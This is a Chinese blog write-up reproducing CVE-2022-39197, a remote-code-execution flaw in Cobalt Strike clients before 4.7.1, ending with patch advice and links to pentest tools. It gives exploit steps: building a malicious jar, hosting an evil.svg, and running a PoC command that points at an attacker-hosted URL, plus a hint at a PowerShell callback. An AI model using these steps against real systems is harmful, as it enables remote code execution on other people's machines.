CS < 4.7.1 RCE 复现踩坑记录

技术

文末附漏洞分析

0x01 漏洞简介

由于Cobalt Strike 使用 GUI 框架 SWING开发,未经身份验证的远程攻击者可通过在 beacon 元数据中注入恶意 HTML 标签,使得CS对其进行解析时加载恶意代码,从而在目标系统上执行任意代码(来自: 奇安信 CERT )

0x02 漏洞危害

获取到攻击者的CS木马样本后,在连接CS的客户端进行命令执行,反制攻击者

影响的版本:

Cobalt Strike < 4.7.1

0x03 漏洞复现

我这里用的CS4.4(实际测试网传的4.4/4.5版本,包括各类魔改版本(包括某些版本做了简单的标签过滤),不加载禁止渲染html的补丁都是可以RCE的)

1、CS木马样本文件

2、EXP地址:https://github.com/its-arun/CVE-2022-39197

1、编辑恶意文件内容

修改Exploit.java,更改exec内代码参数为要执行的命令,我这里执行calc:

picture.image

2、编译文件

使用IDEA+maven进行编译,编译完成后会在target目录下生成EvilJar-1.0-jar-with-dependencies.jar文件,具体如下

picture.image

3、将生成的恶意文件和svg文件放在同一路径下

picture.image

将木马样本放在与cve-2022-39197.py脚本同一路径下

picture.image

4、在serve路径下开启一个web服务

picture.image

picture.image

5、编辑evil.svg文件,替换为当前路径启用的恶意jar的web地址

picture.image

6、执行POC脚本


          
              

            
 python3 cve-2022-39197.py update.exe http://192.168.91.203:9898/evil.svg
 
          
        

运行后,cs客户端上可以看到此时木马已经成功上线

picture.image

当尝试获取用户会话的进程列表

当滚动进程列表进行查看当前会话所在进程名时即触发,请求攻击者web服务上的evil.svg文件,而evil.svg文件又继续加载请求恶意文件EvilJar-1.0-jar-with-dependencies.jar,成功执行命令,从而达到RCE。

细节1:貌似直接滑下去看的话是不会触发的,需要鼠标焦点在含有xss payload的进程名上(但有朋友不会,具体师傅们自测)

picture.image

细节2:执行脚本的时候,马儿名称要是beacon.exe,不然也是不行的

picture.image

可以看到进程名没有被修改

picture.image

看看 cve-2022-39197.py 脚本代码:

beacon.exe在代码里写死了

picture.image

修改后:

picture.image

就可以了:

picture.image

经测试:

WINDOWS下可以直接将执行的命令改成powershell一句话接上线

请求日志:

picture.image

脚本运行100秒后会自动结束木马进程:

picture.image

05修复建议

1、升级至 Cobalt Strike 4.7.2版本

2、加载补丁插件全局禁止html渲染:

地址:https://github.com/burpheart/CVE-2022-39197-patch

启动客户端的时候加入agent参数就行:

picture.image

不渲染html无法触发:

picture.image

默认关于页面的html内容也不渲染了:

picture.image

参考链接:

https://mp.weixin.qq.com/s/OSxcLX21bIdFy1VGd93W7Q

详细分析文章:

https://mp.weixin.qq.com/s/l5e2p_WtYSCYYhYE0lzRdQ

https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注 橘猫学安全:

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“ 再看”

0
0
0
0
关于作者

文章

0

获赞

0

收藏

0

相关资源
vivo 容器化平台架构与核心能力建设实践
为了实现规模化降本提效的目标,vivo 确定了基于云原生理念构建容器化生态的目标。在容器化生态发展过程中,平台架构不断演进,并针对业务的痛点和诉求,持续完善容器化能力矩阵。本次演讲将会介绍 vivo 容器化平台及主要子系统的架构设计,并分享重点建设的容器化核心能力。
相关产品
评论
未登录
看完啦,登录分享一下感受吧~
暂无评论